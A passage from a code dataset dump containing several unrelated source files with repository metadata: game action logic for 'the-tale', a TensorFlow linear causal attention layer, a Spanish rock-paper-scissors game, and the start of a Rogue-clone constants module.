power_bonus=self.hero.buy_artifact_power_bonus())\n\n if unequipped is not None:\n if artifact.id == unequipped.id:\n self.hero.add_message('action_inplace_diary_buying_artifact_and_change_equal_items', diary=True,\n hero=self.hero, artifact=artifact, coins=coins, sell_price=sell_price, coins_delta=coins-sell_price)\n else:\n self.hero.add_message('action_inplace_diary_buying_artifact_and_change', diary=True,\n hero=self.hero, artifact=artifact, coins=coins, old_artifact=unequipped, sell_price=sell_price)\n else:\n self.hero.add_message('action_inplace_diary_buying_artifact', diary=True, hero=self.hero, coins=coins, artifact=artifact)\n\n def spend_money__sharpening_artifact(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n artifact = self.hero.sharp_artifact()\n\n self.hero.add_message('action_inplace_diary_sharpening_artifact', diary=True, hero=self.hero, coins=coins, artifact=artifact)\n\n def spend_money__repairing_artifact(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n artifact = self.hero.repair_artifact()\n\n self.hero.add_message('action_inplace_diary_repairing_artifact', diary=True, hero=self.hero, coins=coins, artifact=artifact)\n\n def spend_money__useless(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n self.hero.add_message('action_inplace_diary_spend_useless', diary=True, hero=self.hero, coins=coins)\n\n def spend_money__impact(self):\n coins = self.try_to_spend_money()\n if coins is not None:\n\n choices = []\n\n if self.hero.preferences.friend is not None and self.hero.preferences.friend.place.id == self.hero.position.place.id:\n choices.append((True, self.hero.preferences.friend))\n\n if self.hero.preferences.enemy is not None and self.hero.preferences.enemy.place.id == self.hero.position.place.id:\n choices.append((False, self.hero.preferences.enemy))\n\n if not choices:\n choices.append((random.choice([True, False]), random.choice(self.hero.position.place.persons)))\n\n impact_type, person = random.choice(choices)\n\n if impact_type:\n power_direction = 1\n self.hero.add_message('action_inplace_diary_impact_good', diary=True, hero=self.hero, coins=coins, person=person)\n else:\n power_direction = -1\n self.hero.add_message('action_inplace_diary_impact_bad', diary=True, hero=self.hero, coins=coins, person=person)\n\n if not self.hero.can_change_person_power(person):\n return\n\n power, positive_bonus, negative_bonus = self.hero.modify_politics_power(power_direction*f.person_power_for_quest(c.QUEST_AREA_RADIUS), person=person)\n person.cmd_change_power(power, positive_bonus, negative_bonus)\n\n def spend_money__experience(self):\n coins = self.try_to_spend_money()\n\n if coins is not None:\n experience = int(c.BASE_EXPERIENCE_FOR_MONEY_SPEND * (1.0 + random.uniform(-c.EXPERIENCE_DELTA_FOR_MONEY_SPEND, c.EXPERIENCE_DELTA_FOR_MONEY_SPEND)) + 1)\n self.hero.add_experience(experience)\n self.hero.add_message('action_inplace_diary_experience', diary=True, hero=self.hero, coins=coins, experience=experience)\n\n\n def spend_money__heal_companion(self):\n if self.hero.companion is None:\n return\n\n if self.hero.companion.health == self.hero.companion.max_health:\n return\n\n coins = self.try_to_spend_money()\n if coins is not None:\n health = self.hero.companion.heal(c.COMPANIONS_REGEN_BY_MONEY_SPEND)\n self.hero.add_message('action_inplace_diary_heal_companion_healed',\n diary=True, place=self.hero.position.place, hero=self.hero, coins=coins, companion=self.hero.companion, health=health)\n\n def spend_money(self):\n\n if self.hero.next_spending.is_INSTANT_HEAL:\n self.spend_money__instant_heal()\n\n elif self.hero.next_spending.is_BUYING_ARTIFACT:\n self.spend_money__buying_artifact()\n elif self.hero.next_spending.is_SHARPENING_ARTIFACT:\n self.spend_money__sharpening_artifact()\n\n elif self.hero.next_spending.is_REPAIRING_ARTIFACT:\n self.spend_money__repairing_artifact()\n\n elif self.hero.next_spending.is_USELESS:\n self.spend_money__useless()\n\n elif self.hero.next_spending.is_IMPACT:\n self.spend_money__impact()\n\n elif self.hero.next_spending.is_EXPERIENCE:\n self.spend_money__experience()\n\n elif self.hero.next_spending.is_HEAL_COMPANION:\n self.spend_money__heal_companion()\n\n else:\n raise exceptions.ActionException('wrong hero money spend type: %d' % self.hero.next_spending)\n\n\n def process_companion_stealing(self):\n\n if self.hero.companion is None:\n return\n\n if self.hero.can_companion_steal_money():\n money = int(f.normal_loot_cost_at_lvl(self.hero.level) * random.uniform(0.8, 1.2) * self.hero.companion_steal_money_modifier) + 1\n self.hero.change_money(MONEY_SOURCE.EARNED_FROM_COMPANIONS, money)\n self.hero.add_message('action_inplace_companion_steal_money', hero=self.hero, place=self.hero.position.place, companion=self.hero.companion, coins=money)\n\n if self.hero.can_companion_steal_item() and not self.hero.bag_is_full:\n loot = artifacts_storage.generate_any_artifact(self.hero, artifact_probability_multiplier=self.hero.companion_steal_artifact_probability_multiplier)\n\n self.hero.put_loot(loot)\n\n if loot.is_useless:\n self.hero.statistics.change_loot_had(1)\n else:\n self.hero.statistics.change_artifacts_had(1)\n\n self.hero.add_message('action_inplace_companion_steal_item', hero=self.hero, place=self.hero.position.place, artifact=loot, companion=self.hero.companion)\n\n\n def process_settlement(self):\n\n if self.state == self.STATE.SPEND_MONEY:\n self.state = self.STATE.CHOOSING\n self.spend_money()\n\n if self.state in [self.STATE.RESTING, self.STATE.HEALING_COMPANION, self.STATE.EQUIPPING, self.STATE.TRADING, self.STATE.REGENERATE_ENERGY]:\n self.state = self.STATE.CHOOSING\n\n if self.state == self.STATE.CHOOSING:\n\n if random.uniform(0, 1) < c.HABIT_IN_PLACE_EVENTS_IN_TURN:\n self.do_events()\n\n if self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n self.state = self.STATE.REGENERATE_ENERGY\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n\n elif self.hero.need_rest_in_settlement:\n self.state = self.STATE.RESTING\n ActionRestPrototype.create(hero=self.hero)\n\n elif self.hero.companion_need_heal():\n self.state = self.STATE.HEALING_COMPANION\n ActionHealCompanionPrototype.create(hero=self.hero)\n\n elif self.hero.need_equipping:\n self.state = self.STATE.EQUIPPING\n ActionEquippingPrototype.create(hero=self.hero)\n\n elif self.hero.need_trade_in_town:\n self.state = self.STATE.TRADING\n ActionTradingPrototype.create(hero=self.hero)\n\n else:\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.PROCESSED:\n self.process_companion_stealing()\n\n\nclass ActionRestPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.REST\n TEXTGEN_TYPE = 'action_rest'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n RESTING = 'resting'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.RESTING)\n hero.add_message('action_rest_start', hero=hero)\n return prototype\n\n def on_heal(self):\n self.percents = float(self.hero.health)/self.hero.max_health\n self.hero.actions.current_action.percents = self.percents\n\n if self.hero.health >= self.hero.max_health:\n self.state = self.STATE.PROCESSED\n\n def process(self):\n\n if self.hero.health >= self.hero.max_health:\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.RESTING:\n\n heal_amount = int(round(float(self.hero.max_health) / self.hero.rest_length * (1 + random.uniform(-c.HEAL_STEP_FRACTION, c.HEAL_STEP_FRACTION))))\n\n heal_amount = self.hero.heal(heal_amount)\n\n if random.uniform(0, 1) < 0.2:\n self.hero.add_message('action_rest_resring', hero=self.hero, health=heal_amount)\n\n self.percents = float(self.hero.health)/self.hero.max_health\n\n if self.hero.health >= self.hero.max_health:\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.PROCESSED:\n self.hero.health = self.hero.max_health\n\n\n\n\nclass ActionEquippingPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.EQUIPPING\n TEXTGEN_TYPE = 'action_equipping'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n EQUIPPING = 'equipping'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n return cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.EQUIPPING)\n\n def process(self):\n\n if self.state == self.STATE.EQUIPPING:\n # TODO: calculate real percents\n self.percents = min(self.percents+0.25, 1)\n\n slot, unequipped, equipped = self.hero.equip_from_bag()\n\n if equipped:\n if unequipped:\n if equipped.id == unequipped.id:\n self.hero.add_message('action_equipping_diary_change_equal_items', diary=True, hero=self.hero, item=equipped)\n else:\n self.hero.add_message('action_equipping_diary_change_item', diary=True, hero=self.hero, unequipped=unequipped, equipped=equipped)\n else:\n self.hero.add_message('action_equipping_diary_equip_item', diary=True, hero=self.hero, equipped=equipped)\n else:\n self.state = self.STATE.PROCESSED\n\n\nclass ActionTradingPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.TRADING\n TEXTGEN_TYPE = 'action_trading'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n TRADING = 'trading'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n percents_barier=hero.bag.occupation,\n state=cls.STATE.TRADING)\n hero.add_message('action_trading_start', hero=hero)\n return prototype\n\n def process(self):\n\n if self.state == self.STATE.TRADING:\n\n if not self.hero.bag.is_empty:\n artifact = random.choice(self.hero.bag.values())\n sell_price = self.hero.sell_artifact(artifact)\n self.hero.add_message('action_trading_sell_item', hero=self.hero, artifact=artifact, coins=sell_price)\n\n loot_items_count = self.hero.bag.occupation # pylint: disable=W0612\n\n if loot_items_count:\n self.percents = 1 - float(loot_items_count - 1) / self.percents_barier\n else:\n self.state = self.STATE.PROCESSED\n\n\nclass ActionMoveNearPlacePrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.MOVE_NEAR_PLACE\n TEXTGEN_TYPE = 'action_movenearplace'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n MOVING = 'MOVING'\n BATTLE = 'BATTLE'\n REGENERATE_ENERGY = 'REGENERATE_ENERGY'\n RESTING = 'RESTING'\n RESURRECT = 'RESURRECT'\n IN_CITY = 'IN_CITY'\n HEALING_COMPANION = 'healing_companion'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _get_destination_coordinates(cls, back, place, terrains):\n if back:\n return place.x, place.y\n else:\n choices = ()\n\n if terrains is not None:\n map_info = map_info_storage.item\n choices = [ (x, y) for x, y in place.nearest_cells if map_info.terrain[y][x] in terrains]\n\n if not choices:\n choices = place.nearest_cells\n\n return random.choice(choices)\n\n @classmethod\n def _create(cls, hero, bundle_id, place, back, terrains=None):\n\n x, y = cls._get_destination_coordinates(back=back, place=place, terrains=terrains)\n\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n place_id=place.id,\n destination_x=x,\n destination_y=y,\n state=cls.STATE.MOVING,\n back=back)\n\n from_x, from_y = hero.position.cell_coordinates\n\n hero.position.set_coordinates(from_x, from_y, x, y, percents=0)\n\n return prototype\n\n def get_description_arguments(self):\n args = super(ActionMoveNearPlacePrototype, self).get_description_arguments()\n args.update({'place': self.place})\n return args\n\n\n def preprocess(self):\n\n if self.replane_required:\n self.state = self.STATE.PROCESSED\n return True\n\n if not self.hero.is_alive:\n ActionResurrectPrototype.create(hero=self.hero)\n self.state = self.STATE.RESURRECT\n return True\n\n if self.hero.need_rest_in_move:\n ActionRestPrototype.create(hero=self.hero)\n self.state = self.STATE.RESTING\n return True\n\n if self.hero.companion_need_heal():\n ActionHealCompanionPrototype.create(hero=self.hero)\n self.state = self.STATE.HEALING_COMPANION\n return True\n\n return False\n\n def process_battle(self):\n\n if self.hero.need_regenerate_energy:\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n self.state = self.STATE.REGENERATE_ENERGY\n return\n\n if self.hero.need_rest_in_move:\n ActionRestPrototype.create(hero=self.hero)\n self.state = self.STATE.RESTING\n return\n\n self.state = self.STATE.MOVING\n\n\n def process_moving(self):\n\n\n if self.hero.need_regenerate_energy and self.hero.preferences.energy_regeneration_type != e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE:\n ActionRegenerateEnergyPrototype.create(hero=self.hero)\n self.state = self.STATE.REGENERATE_ENERGY\n\n elif self.hero.position.is_battle_start_needed():\n mob = mobs_storage.create_mob_for_hero(self.hero)\n ActionBattlePvE1x1Prototype.create(hero=self.hero, mob=mob)\n self.state = self.STATE.BATTLE\n\n else:\n\n if self.hero.companion and self.hero.can_companion_say_wisdom() and random.random() < c.COMPANIONS_EXP_PER_MOVE_PROBABILITY:\n self.hero.add_experience(c.COMPANIONS_EXP_PER_MOVE_GET_EXP, without_modifications=True)\n self.hero.add_message('companions_say_wisdom', companion_owner=self.hero, companion=self.hero.companion, experience=c.COMPANIONS_EXP_PER_MOVE_GET_EXP)\n\n elif random.uniform(0, 1) < 0.25:\n self.hero.add_message('action_movenearplace_walk', hero=self.hero, place=self.place)\n\n\n if self.hero.position.subroad_len() == 0:\n self.hero.position.percents += 0.1\n else:\n move_speed = self.hero.position.modify_move_speed(self.hero.move_speed)\n delta = move_speed / self.hero.position.subroad_len()\n self.hero.position.percents += delta\n\n self.percents = self.hero.position.percents\n\n if self.hero.position.percents >= 1:\n\n to_x, to_y = self.hero.position.coordinates_to\n\n if self.back and not (self.place.x == to_x and self.place.y == to_y):\n # if place was moved\n from_x, from_y = self.hero.position.coordinates_to\n self.hero.position.set_coordinates(from_x, from_y, self.place.x, self.place.y, percents=0)\n return\n\n self.hero.position.percents = 1\n self.percents = 1\n\n if self.place.x == to_x and self.place.y == to_y:\n self.hero.position.set_place(self.place)\n ActionInPlacePrototype.create(hero=self.hero)\n self.state = self.STATE.IN_CITY\n\n else:\n self.state = self.STATE.PROCESSED\n\n\n def process(self):\n\n if self.preprocess():\n return\n\n if self.state == self.STATE.RESTING:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.RESURRECT:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.REGENERATE_ENERGY:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.HEALING_COMPANION:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.IN_CITY:\n if self.percents >= 1:\n self.state = self.STATE.PROCESSED\n else:\n self.state = self.STATE.MOVING\n\n if self.state == self.STATE.BATTLE:\n self.process_battle()\n\n if self.state == self.STATE.MOVING:\n self.process_moving()\n\n\nclass ActionRegenerateEnergyPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.REGENERATE_ENERGY\n TEXTGEN_TYPE = 'action_regenerate_energy'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n REGENERATE = 'REGENERATE'\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.REGENERATE)\n\n hero.add_message('action_regenerate_energy_start_%s' % cls.regeneration_slug(hero.preferences.energy_regeneration_type), hero=hero)\n\n return prototype\n\n @property\n def description_text_name(self):\n return '%s_description_%s' % (self.TEXTGEN_TYPE, self.regeneration_slug(self.regeneration_type))\n\n\n @property\n def regeneration_type(self):\n return self.hero.preferences.energy_regeneration_type\n\n @classmethod\n def regeneration_slug(cls, regeneration_type):\n return { e.ANGEL_ENERGY_REGENERATION_TYPES.PRAY: 'pray',\n e.ANGEL_ENERGY_REGENERATION_TYPES.SACRIFICE: 'sacrifice',\n e.ANGEL_ENERGY_REGENERATION_TYPES.INCENSE: 'incense',\n e.ANGEL_ENERGY_REGENERATION_TYPES.SYMBOLS: 'symbols',\n e.ANGEL_ENERGY_REGENERATION_TYPES.MEDITATION: 'meditation' }[regeneration_type]\n\n def step_percents(self):\n return 1.0 / c.ANGEL_ENERGY_REGENERATION_STEPS[self.regeneration_type]\n\n def process(self):\n\n if self.state == self.STATE.REGENERATE:\n\n self.percents += self.step_percents()\n\n if self.percents >= 1:\n multiplier = 2 if self.hero.can_regenerate_double_energy else 1\n energy_delta = self.hero.change_energy(f.angel_energy_regeneration_amount(self.regeneration_type)*multiplier)\n self.hero.last_energy_regeneration_at_turn = TimePrototype.get_current_turn_number()\n\n if energy_delta:\n self.hero.add_message('action_regenerate_energy_energy_received_%s' % self.regeneration_slug(self.regeneration_type), hero=self.hero, energy=energy_delta)\n else:\n self.hero.add_message('action_regenerate_energy_no_energy_received_%s' % self.regeneration_slug(self.regeneration_type), hero=self.hero)\n\n self.state = self.STATE.PROCESSED\n\n\nclass ActionDoNothingPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.DO_NOTHING\n TEXTGEN_TYPE = 'no texgen type'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n\n class STATE(ActionBase.STATE):\n DO_NOTHING = 'DO_NOTHING'\n\n @property\n def description_text_name(self):\n return '%s_description' % self.textgen_id\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id, duration, messages_prefix, messages_probability):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n percents_barier=duration,\n extra_probability=messages_probability,\n textgen_id=messages_prefix,\n state=cls.STATE.DO_NOTHING)\n hero.add_message('%s_start' % messages_prefix, hero=hero)\n return prototype\n\n def process(self):\n\n if self.state == self.STATE.DO_NOTHING:\n\n self.percents += 1.0001 / self.percents_barier\n\n if self.extra_probability is not None and random.uniform(0, 1) < self.extra_probability:\n self.hero.add_message('%s_donothing' % self.textgen_id, hero=self.hero)\n\n if self.percents >= 1.0:\n self.state = self.STATE.PROCESSED\n\n\nclass ActionMetaProxyPrototype(ActionBase):\n\n SINGLE = False\n TYPE = relations.ACTION_TYPE.META_PROXY\n TEXTGEN_TYPE = 'no texgen type'\n HELP_CHOICES = set((HELP_CHOICES.HEAL, HELP_CHOICES.MONEY, HELP_CHOICES.EXPERIENCE, HELP_CHOICES.STOCK_UP_ENERGY, HELP_CHOICES.HEAL_COMPANION))\n APPROVED_FOR_STEPS_CHAIN = False\n\n @property\n def description_text_name(self):\n return self.meta_action.description_text_name\n\n def get_description_arguments(self):\n hero_2 = self.meta_action.hero_2 if self.hero.id == self.meta_action.hero_1.id else self.meta_action.hero_1\n return {'duelist_1': self.hero,\n 'duelist_2': hero_2}\n\n @property\n def ui_type(self):\n return self.meta_action.TYPE\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id, meta_action):\n return cls( hero=hero,\n bundle_id=bundle_id,\n meta_action_id=meta_action.id,\n state=meta_action.state)\n\n def process(self):\n\n self.meta_action.process()\n\n self.state = self.meta_action.state\n self.percents = self.meta_action.percents\n\n\nclass ActionHealCompanionPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.HEAL_COMPANION\n TEXTGEN_TYPE = 'action_heal_companion'\n HELP_CHOICES = set((HELP_CHOICES.HEAL_COMPANION, ))\n\n HABIT_MODE = relations.ACTION_HABIT_MODE.COMPANION\n\n class STATE(ActionBase.STATE):\n HEALING = 'healing'\n\n def get_description_arguments(self):\n args = super(ActionHealCompanionPrototype, self).get_description_arguments()\n if self.hero.companion:\n args.update({'companion': self.hero.companion})\n return args\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.HEALING)\n hero.companion.on_heal_started()\n hero.add_message('action_heal_companion_start', hero=hero, companion=hero.companion)\n return prototype\n\n def after_processed(self):\n if self.hero.companion is None:\n return\n\n health = self.hero.companion.heal(c.COMPANIONS_HEALTH_PER_HEAL)\n if health > 0:\n self.hero.add_message('action_heal_companion_finish', hero=self.hero, companion=self.hero.companion, health=health)\n else:\n self.hero.add_message('action_heal_companion_finish_without_healing', hero=self.hero, companion=self.hero.companion)\n\n if self.hero.can_companion_exp_per_heal() and random.random() < self.hero.companion_exp_per_heal_probability:\n self.hero.add_experience(c.COMPANIONS_EXP_PER_HEAL, without_modifications=True)\n\n if (self.hero.companion.health < self.hero.companion.max_health and\n self.hero.can_companion_regenerate() and\n random.random() < self.hero.companion_regenerate_probability):\n health = self.hero.companion.heal(utils_logic.randint_from_1(c.COMPANIONS_REGEN_ON_HEAL_AMOUNT))\n self.hero.add_message('companions_regenerate', companion_owner=self.hero, companion=self.hero.companion, health=health)\n\n if (self.hero.companion.health < self.hero.companion.max_health and\n ( (self.hero.companion.type.is_LIVING and random.random() < self.hero.companion_living_heal_probability) or\n (self.hero.companion.type.is_CONSTRUCT and random.random() < self.hero.companion_construct_heal_probability) or\n (self.hero.companion.type.is_UNUSUAL and random.random() < self.hero.companion_unusual_heal_probability) )\n ):\n health = self.hero.companion.heal(utils_logic.randint_from_1(c.COMPANIONS_REGEN_BY_HERO))\n self.hero.add_message('hero_ability_companion_healing', actor=self.hero, companion=self.hero.companion, health=health)\n\n\n def on_heal_companion(self):\n if self.hero.companion is None:\n self.state = self.STATE.PROCESSED\n return\n\n if self.hero.companion.health >= self.hero.companion.max_health:\n self.state = self.STATE.PROCESSED\n\n heal_length = f.companions_heal_length(self.hero.companion.health, self.hero.companion.max_health)\n\n self.percents += 1.0 / heal_length\n\n if self.percents >= 1.0 or self.hero.companion.health == self.hero.companion.max_health:\n self.percents = 1\n self.state = self.STATE.PROCESSED\n\n def process(self):\n\n if self.hero.companion is None:\n self.state = self.STATE.PROCESSED\n return\n\n if self.hero.companion.health >= self.hero.companion.max_health:\n self.hero.companion.health = self.hero.companion.max_health\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.HEALING:\n\n heal_length = f.companions_heal_length(self.hero.companion.health, self.hero.companion.max_health)\n\n self.percents += 1.0 / heal_length\n\n if random.uniform(0, 1) < 0.1:\n self.hero.add_message('action_heal_companion_healing', hero=self.hero, companion=self.hero.companion)\n\n if self.percents >= 1.0:\n self.percents = 1\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.PROCESSED:\n self.after_processed()\n\n\n\n\n\nACTION_TYPES = { action_class.TYPE:action_class\n for action_class in discovering.discover_classes(globals().values(), ActionBase) }\n","repo_name":"qqname/the-tale","sub_path":"the_tale/game/actions/prototypes.py","file_name":"prototypes.py","file_ext":"py","file_size_in_byte":76982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"19802726409","text":"\"\"\"\r\nCopyright 2020 Yi Lin(Kyle) Gao\r\n#@title Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# https://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\"\"\"\r\n\r\n\r\nimport tensorflow as tf\r\nfrom helperfunctions import elu\r\n\r\n\r\nclass MultiHeadAttentionCausalMasked(tf.keras.layers.Layer):\r\n \"\"\"LinearAttention Mechanism from Transformers are RNNs: Fast Autoregressive Transformers\r\n with Linear Attention by Angelos Katharopoulos, Apoorv Vyas, Nikolaos Pappas, François Fleuret.\r\n\r\n Uses linear feature maps f, to replace the softmax by a kernel k(x,y)->R+.\r\n so that f(x)*f(y) = k(x,y)\r\n\r\n The authors use the elu feature map.\r\n\r\n This version has causal i.e. forward masking. This cannot be implemented in the usual way due to the\r\n Q*K term not existing in isolation in this Linear Attention.\r\n I have implemented it in clumsy way which makes this slower than the usual softmax attention by quite a bit.\r\n\r\n Tne authors of the paper implemented causal attention via a triangular tensor product (and its back prop) in c++.\r\n\r\n I have implemented it in clumsy way which makes this slower than the usual softmax attention by quite a bit\r\n by introducing an intermediate step with the dimensions of the Q*K product.\r\n \"\"\"\r\n\r\n \"\"\"NOTE!!! Due to change of dimensionality of the tensor in the intermediate step, \r\n a different masking scheme must be used. Use helperfunctions.forward_mask5() and \r\n helper.functions.padding_mask5() on any transformer which calls this attention layer.\"\"\"\r\n\r\n def __init__(self, d_model, num_heads):\r\n super().__init__()\r\n self.d_model = d_model\r\n self.num_heads = num_heads\r\n\r\n assert d_model % self.num_heads == 0\r\n\r\n self.depth = d_model // self.num_heads\r\n\r\n self.wq = tf.keras.layers.Dense(d_model)\r\n self.wk = tf.keras.layers.Dense(d_model)\r\n self.wv = tf.keras.layers.Dense(d_model)\r\n\r\n self.dense = tf.keras.layers.Dense(d_model)\r\n\r\n def split_heads(self, x, batch_size):\r\n \"\"\"Split the last dimension into (num_heads,depth)\r\n Arguments:\r\n x -- A tokenized sequence (batch_size,seq_len,d_model)\r\n\r\n Returns:\r\n A tokenized sequence with dimensions (batch_size, num_heads, seq_len, depth)\r\n \"\"\"\r\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))\r\n return x\r\n\r\n def call(self, q, k, v, mask=None, eps=1e-8):\r\n batch_size = tf.shape(q)[0]\r\n\r\n q = self.wq(q) # (batch_size,len_q, dim_q)\r\n k = self.wk(k) # (batch_size,len_v, dim_q)\r\n v = self.wv(v) # (batch_size,len_v, dim_v)\r\n\r\n q = elu(self.split_heads(q, batch_size)) # (batch_size, seq_len_q, num_heads, depth_q) (m,l,h,d)\r\n k = elu(self.split_heads(k, batch_size)) # (batch_size, seq_len_v, num_heads, depth_q) (m,j,h,d)\r\n v = self.split_heads(v, batch_size) # (batch_size, seq_len_v, num_heads, depth_v) (m,j,h,e)\r\n\r\n k_reduced = tf.math.reduce_sum(k, axis=1) + 1e-8\r\n\r\n z = 1 / (tf.einsum(\"mlhd,mhd->mlh\", q, k_reduced)) # (batch_size, num_heads, seq_len_q)\r\n\r\n output = tf.einsum(\"mjhd,mjhe->mjehd\", k, v) # (batch_size, len_v, depth_q, num_heads, depth_v)\r\n\r\n output = tf.einsum(\"mlhd,mjehd,mlh->mjlhe\", q, output, z) # (batch_size, len_q, len_v, num_heads, depth_v)\r\n\r\n if mask is not None:\r\n output = output * mask # Mask must broadcast to j and l axis correctly\r\n\r\n output = tf.einsum(\"mjlhe->mlhe\", output)\r\n\r\n output = tf.reshape(output, (batch_size, -1, self.num_heads * self.depth)) # (batch_size,len_q, d_model)\r\n return output # (m,l,h*e)","repo_name":"kyle-gao/TF_Transformer","sub_path":"LinearMultiHeadAttentionCausalMasked.py","file_name":"LinearMultiHeadAttentionCausalMasked.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"70612109868","text":"import random\n\nprint(\"PIEDRA PAPEL O TIJERA\")\n\npunmaq=0\npunuser=0\nintentos =0\nn=int(input(\"Cuantas veces desea jugar: \"))\n\nwhile intentos < n:\n maq = random.randint(1,3)\n print(\"Seleccione la opcion\")\n print(\"\"\"1. PIEDRA\n2. PAPEL\n3. TIJERA\"\"\")\n us= int(input())\n if us >=1 and us <=3:\n\n if (maq == 1 and us== 2) or (maq==2 and us== 3) or (maq==3 and us== 1):\n punuser +=1\n print(\"Ganaste\")\n elif (maq == 1 and us == 3) or (maq== 2 and us== 1) or (maq== 3 and us== 2):\n punmaq +=1\n print(\"Perdiste\") \n elif maq == us:\n print(\"Empate\")\n punmaq = punmaq\n punuser = punuser\n else:\n print(\"Digito una opcion incorrecta\")\n intentos+=1\n\nprint(f\"puntos Maquina {punmaq}\")\nprint(f\"puntos usuario {punuser}\")","repo_name":"Yurrely28/Piedra-papel-o-tijera-python","sub_path":"juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28039829134","text":"from Rogue import DaemonManager, RogueRandomizer\nfrom enum import IntEnum, IntFlag\n\nwasWizard:bool = True\n\n# for debug\nimport logging\nlogging.basicConfig(filename=\".\\\\data\\\\rogue.log\",level=logging.DEBUG)\nlogger = logging.getLogger()\n\n# score filename\nscoreFilename = \".\\\\data\\\\score.dat\"\nscoreTable = None\n\n# Constant value\nMaxRooms:int = 9\nLevelWhereAmuletExists:int = 25\n\n# System Variables\ncursesLines:int = 0\ncursesColumns:int=0\n\n# managers\nrandomizer = RogueRandomizer()\nrnd = randomizer.next\ndaemonManager:DaemonManager = DaemonManager()\n\n# Things that appear on the screens\nPassage = \"#\"\nDoor = \"+\"\nFloor = \".\"\nPlayer = \"@\"\nTrap = \"^\"\nSecretDoor = \"&\"\nStairs = \"%\"\nGold = \"*\"\nPotion = \"!\"\nScroll = \"?\"\nMagic = \"$\"\nFood = \":\"\nWeapon = \")\"\nArmor = \"]\"\nAmulet = \",\"\nRing = \"=\"\nStick = \"/\"\n\nclass InventryItemTypes(IntEnum):\n DisplayAll = 0\n Callable = -1\n\n# Various flag bits\nclass Flags(IntFlag):\n IsCursed = 2 ** 1\n IsKnow = 2 ** 2\n 